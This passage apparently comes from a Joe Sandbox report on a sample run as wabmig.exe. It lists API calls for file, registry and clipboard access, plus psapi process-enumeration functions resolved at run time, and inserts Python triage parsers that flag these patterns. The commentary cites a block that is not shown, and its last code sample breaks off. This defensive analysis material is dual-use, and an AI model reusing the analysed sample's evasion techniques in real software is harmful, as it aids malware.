                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 3859505661-0
                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
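The two blocks above that matter most for triage are the 0040A804 wrapper (GetSystemDirectoryW + wcscpy/wcscat + LoadLibraryW followed by GetProcAddress, the same API profile 3150196962-0 as the block at the top of this section) and the psapi.dll resolver, whose GetProcAddress calls carry the target names (EnumProcessModules, GetModuleFileNameExW, EnumProcesses, GetModuleInformation) as plain strings. None of those names reach the PE import table, so an import-based triage misses them; the dump records them only because the IDA plugin captured the string arguments. The following Python is an added example, not part of the Joe Sandbox report or of any tool the report names: it parses this block format into records, lists the names a block binds at run time, flags functions that both load a library and resolve from it, and groups blocks by the report's own "API String ID". The SAMPLE text is copied from the two blocks above; the heuristics (`resolved_names`, `uses_runtime_resolution`) are my own assumptions about what is worth flagging, not Joe Sandbox logic.

```python
"""Parse Joe Sandbox IDA-plugin function blocks into records and flag run-time API resolution.
Added example, not part of the report: SAMPLE is copied from two blocks of this report
(the 0040A804 loader wrapper and the psapi.dll resolver); the heuristics are mine."""
import re
from collections import defaultdict

# One API line, with or without an argument list or a 'Part of subcall function' prefix, e.g.
#   GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
#   Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
KV_RE = re.compile(r"^([A-Za-z ]+): ?(.*)$")  # 'Opcode ID: ...' style metadata lines
HEX_RE = re.compile(r"^[0-9A-F]{8}$")         # literal numeric argument, not a name

def parse_blocks(text):
    """Return one dict per function block; a block is closed by its 'Instruction Fuzzy Hash' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        cur = cur or {"apis": [], "strings": [], "meta": {}}
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                                "subcall": m["sub"],
                                "args": m["args"].split(",") if m["args"] else []})
        elif ", xrefs: " in line:                  # entries of a 'Strings' section
            cur["strings"].append(line.rsplit(", xrefs: ", 1)[0])
        elif (kv := KV_RE.match(line)):
            cur["meta"][kv[1]] = kv[2]
            if kv[1] == "Instruction Fuzzy Hash":  # last line of every block
                records.append(cur)
                cur = None
    return records

def resolved_names(rec):
    """Literal strings handed to GetProcAddress (direct calls and subcalls): APIs bound at
    run time and therefore absent from the PE import table. '?' and hex literals are skipped."""
    return [a["args"][1] for a in rec["apis"]
            if a["name"] == "GetProcAddress" and len(a["args"]) == 2
            and a["args"][1] != "?" and not HEX_RE.match(a["args"][1])]

def uses_runtime_resolution(rec):
    """True when one function (with its subcalls) both loads a library and resolves from it."""
    names = {a["name"] for a in rec["apis"]}
    return "GetProcAddress" in names and any(n.startswith("LoadLibrary") for n in names)

def index_by_api_string_id(records):
    """Group blocks by the report's 'API String ID' (same API profile, possibly different code)."""
    idx = defaultdict(list)
    for r in records:
        idx[r["meta"].get("API String ID", "")].append(r["meta"].get("Opcode ID", ""))
    return dict(idx)

# Constructed input: two blocks copied verbatim from the report text above.
SAMPLE = """APIs
  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• API String ID: 3150196962-0
• Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
• Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
• Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
• Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: AddressProc$FileModuleName
• String ID:
• API String ID: 3859505661-0
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
• Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
• Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
"""
```

Running `parse_blocks(SAMPLE)` on the report text yields two records: the first is flagged by `uses_runtime_resolution`, the second yields `["psapi.dll", "EnumProcessModules", "GetModuleFileNameExW", "EnumProcesses", "GetModuleInformation"]` from `resolved_names` (the first entry is kept exactly as the plugin recorded it, a `GetProcAddress` whose second argument is `psapi.dll`). Two caveats for anyone turning this into hunting logic: `K32GetModuleFileNameExW` is kernel32's own export of the psapi function, so the same capability can appear under either spelling, and the "API String ID" only groups functions with identical API profiles; the Opcode and Instruction IDs, not the API ID, are what distinguish two implementations.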
                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            APIs
                                                                            • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: EnumNamesResource
                                                                            • String ID:
                                                                            • API String ID: 3334572018-0
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            APIs
                                                                            • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004095FC
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3655998216-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00445426
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                            • String ID:
                                                                            • API String ID: 1828521557-0
                                                                            APIs
                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                            • String ID:
                                                                            • API String ID: 2136311172-0
                                                                            APIs
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@
                                                                            • String ID:
                                                                            • API String ID: 1936579350-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                            • String ID:
                                                                            • API String ID: 3604893535-0
                                                                            • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                            • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                            • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                            • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                            • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMessageProc
                                                                            • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                            • API String ID: 2780580303-317687271
                                                                            • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                            • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                            • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                            APIs
                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                            • String ID:
                                                                            • API String ID: 1213725291-0
                                                                            • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                            • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                            • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
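The two clipboard functions listed above (one pushes a file's contents, the other a wide string, onto the clipboard as CF_UNICODETEXT, format 0xD) and the comctl32.dll LoadLibraryW/GetProcAddress stub are API sequences an analyst usually wants extracted from the listing rather than read by eye. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It parses function blocks in the format shown here into call records and applies two heuristics of my own: a complete EmptyClipboard/SetClipboardData/CloseClipboard sequence, and LoadLibrary followed by GetProcAddress with the resolved names attached. The sample input is constructed by copying three blocks from this section and trimming them to the lines the parser reads; the tag names and heuristics are assumptions, while CF_UNICODETEXT = 0xD is the documented Win32 constant.

```python
"""Parse Joe Sandbox IDA-plugin function listings and flag capability patterns.
Added example (editor's own, not Joe Sandbox code); the heuristics are assumptions."""
import re

# Constructed sample: three function blocks copied from the wabmig.exe (process 17)
# listing in this report, trimmed to the lines the parser reads.
SAMPLE = """\
APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• CloseClipboard.USER32 ref: 0040997D
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Memory Dump Source
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
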